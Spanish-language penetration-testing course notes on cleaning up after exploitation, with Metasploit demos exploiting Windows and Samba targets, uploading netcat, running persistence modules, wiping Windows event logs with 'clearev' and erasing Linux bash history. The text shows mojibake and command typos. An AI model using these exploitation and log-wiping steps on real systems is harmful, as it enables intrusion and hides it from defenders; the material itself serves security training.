Clearing

Clearing Your Tracks On Windows

Las fases de explotaci贸n y post-explotaci贸n de una prueba de penetraci贸n implican interactuar activamente con los sistemas de destino y los datos almacenados en estos sistemas.

Como resultado, es posible que se le solicite que borre o deshaga los cambios que haya realizado en los sistemas de destino que ha comprometido seg煤n las pautas especificadas en las reglas de interacci贸n.

Si ha transferido archivos a los sistemas de destino que ha comprometido, lleve un registro de d贸nde se han guardado para poder eliminarlos cuando haya terminado.

Una buena pr谩ctica es almacenar todos sus scripts, exploits y binarios en el directorio C:/Temp en Windows y en el directorio /tmp en Linux.

Tambi茅n es importante tener en cuenta el marco de explotaci贸n que se est谩 utilizando; un ejemplo de esto es MSF, que es conocido por generar y almacenar artefactos en el sistema de destino cuando se utilizan m贸dulos de explotaci贸n o post.

Algunos m贸dulos MSF bien dise帽ados le proporcionan instrucciones y secuencias de comandos de recursos que le proporcionan informaci贸n sobre d贸nde se almacenan los artefactos y c贸mo se pueden eliminar.

En el contexto de Windows, una t茅cnica t铆pica de postexplotaci贸n pertinente para limpiar sus huellas es eliminar el Registro de eventos de Windows. Esto es algo que se debe evitar durante una prueba de penetraci贸n, ya que el Registro de eventos de Windows almacena una gran cantidad de datos que son importantes para el cliente para el que se est谩 realizando la prueba de penetraci贸n.

Demo: Clearing Your Tracks On Windows

# Explotamos la maquina de la victima
msf6 exploit(windows/http/badbtue_passthru) > exploit
meterpreter > sysinfo
meterpreter > getuid
# Crear un directorio temporal en la unidad C y acceder al mismo
meterpreter > pwd
C:\Temp
meterpreter > upload /usr/share/windows-binaries/nc.exe
meterpreter > ls
meterpreter > rm nc.exe
meterpreter > ls

msf6 exploit (windows/httplbadbtue passthru) > search persistence platform:windows
msf6 exploit (windows/httplbadbtue passthru) > use 2
msf6 exploit (windows/httplbadbtue passthru) > explolit
# Cuando se ejecuta el exploit podra ver que le proporciona
# informacion para limpiar lo que creo el mismo
# eso incluye servicios ejecutables y cualquier otro rastro
# NO SE RECOMIENDA DEJAR RASTROS DEBIDO A QUE OTRO ATACANTE LO PUEDE APROVECHAR
# conocer bien de todos los artefactos que se crean
# Para ejectar el comando
resource cleanup.rc

# Limpiar los eventos de eventViewer de windos
meterpreter > clearev

Quiz: Clearing Your Tracks On Windows

Clearing Your Tracks On Linux

Demo: Clearing Your Tracks On Linux

nmap -sV -p 445 192.143.174.3

msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
msf5 exploit(linux/samba/is_known_pipename) > exploit
/bin/bash -i

root@victim-l:/# cd /tmp
root@victim-l:/tmp# ls

# Normalmente se alacaneara el historial de comandos en el archivo
.nashrc

root@victim-l:/root# echo "1 cd /tmp" > .bash_history

# Borrar el historial de comandos
history -c

# Tambien puede ejecutar el siguiente comando
root@victim-l:/root# cat /dev/null > .bash_history
history -c



Quiz: Clearing Your Tracks On Linux

Last updated